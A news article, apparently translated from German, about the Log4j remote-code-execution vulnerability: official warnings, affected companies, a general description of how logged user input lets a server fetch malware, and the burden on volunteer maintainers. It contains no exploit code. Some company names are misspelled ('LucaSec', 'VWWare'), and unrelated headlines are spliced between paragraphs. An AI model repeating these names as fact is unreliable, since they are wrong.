Software Vulnerability: There's A Fire In The Internet

A bug in software makes prominent services from Apple to Amazon vulnerable. The case shows how dependent the Internet is on the work of volunteers.

Apple iCloud, Amazon, Steam, Minecraft: some of the world's best-known online applications were or are apparently vulnerable. Because of a problem with Log4j, a software that is part of a large number of programs, attackers could run malware on foreign systems and possibly even hijack it completely. 

The Federal Office for Information Security (BSI) speaks of an "extremely critical threat situation" and issued a red warning.

IT security experts sometimes choose even more drastic words: "The Internet is currently on fire," said the head of the company Crowdstrike of the AP news agency. 

End users are also potentially affected by the problem. "This security hole harbors the risk that your computer will be compromised," writes the maker of the game Minecraft in a blog entry, along with instructions on how players can behave. In principle, however, there is little you can do other than make sure that you are using the latest software versions (which actually always applies).

Facebook Launches First 3D 'Virtual Reality Social Media App'

According to the BSI, however, all administrators and developers who use Log4j should act immediately. There is already a corresponding update. Technically speaking, this closes the gap. However, the problem is not over yet. Firstly, the update has to be installed everywhere, and secondly, the applications themselves may still have to be adapted. "The patch management of Java applications is not trivial," writes the BSI, which has published a list of countermeasures for developers. 

The case shows once again how dependent large parts of the digital infrastructure are on individual software modules. Log4j is a library for the Java programming language. Think of it as a collection of ready-made commands: so that you don't always have to program everything from scratch, certain program functions are combined in libraries that developers can import into their project so that they can then quickly access them. Some of these libraries are extremely widespread. 

Two-Factor Authentication With Google: E-mails Are Better Than Doubly Secured

Log4j is used to record and log the activities of a program. Such a log is used by software developers, for example, to check whether the program is running properly or to be able to track problems afterwards. User inputs can also be written to the log. This is where the problem of the Log4j vulnerability lies.

As an IT security company demonstrated, attackers can use the log file to run their own programs. To do this, certain commands have to be entered, for example in the search bar of a website, in the chat, or in the field where the username normally belongs. These commands cause the server of a website to connect to another server, for example one from which malicious software is then downloaded. The technical term for this type of attack is remote code execution. 

This potentially affects all applications that use Log4j to log user input. Apparently there are very, very many. The security company LucaSec, which was the first to report the vulnerability on Thursday, describes Log4j as "ubiquitous". The list of apparently proven cases of the vulnerability led by a GitHub user also includes many prominent names such as Tesla and Google.

Applications that are lesser known too many people but are central to the digital infrastructure are apparently also affected. The software manufacturer VWWare and the hosting service provider Cloudflare have confirmed this. Cloudflare CEO Matthew Prince tweeted that it was so bad his company wanted to help protect customers who didn't use the paid firewall. That has happened in the meantime, but it cannot offer complete security. All concerned should "patch as soon as possible!" Wrote Prince. "This is a serious vulnerability that is actively being exploited."

How Can Earn Money Through Facebook

It is not currently possible to fully predict how serious the consequences of the gap will be. On the one hand, it depends on how many systems are actually affected and, on the other hand, how quickly they are backed up. Experience with other security flaws in widely used software shows that many systems are still vulnerable long after a patch has been released. 

The fact that criminals immediately began to look for vulnerable systems and exploit the vulnerability was shown, among other things, by the findings of the Telekom Computer Emergency Response Team. "Unfortunately, not only security teams, but also hackers work overtime to find the answer," said Rüdiger Trost from the IT security company F-Secure to the dpa news agency. Attackers could now only build inconspicuous back doors for themselves with the help of the gap, he warned. "The actual attacks will certainly take place weeks or many months later."

The story also sheds light on a specialty of the software world that gives rise to various insider jokes: Some of the small program modules that are extremely widespread are developed and maintained by a few enthusiasts. Log4j is a project of the Apache Software Foundation, an organization that develops open source software. The programs and frameworks are in part essential for large parts of the Internet. Although companies such as Amazon, Microsoft and Google donate money to Apache, the work on the projects is done by volunteers. There is talk on the net that in the case of Log4j there are three people, others speak of six. 

"The Log4j maintainers worked sleeplessly on remedial measures", Volkan Yazıcı, who was involved, wrote on Twitter. "But nothing prevents people from berating us for a job we don't get paid for, a role we all don't like, but which had to be kept due to backward compatibility concerns."

The fact that there is such a dependency on poorly financed projects is a big problem, wrote Henning Tillmann, chairman of the network policy think tank D64, on Twitter. Large corporations that use technology from "hobby developers" do not share their profits with them enough. His conclusion: "Then politics has to regulate it".

Do You Know What We Have Posted on

Twitter Facebook Instagram Reddit tumblr

Post a Comment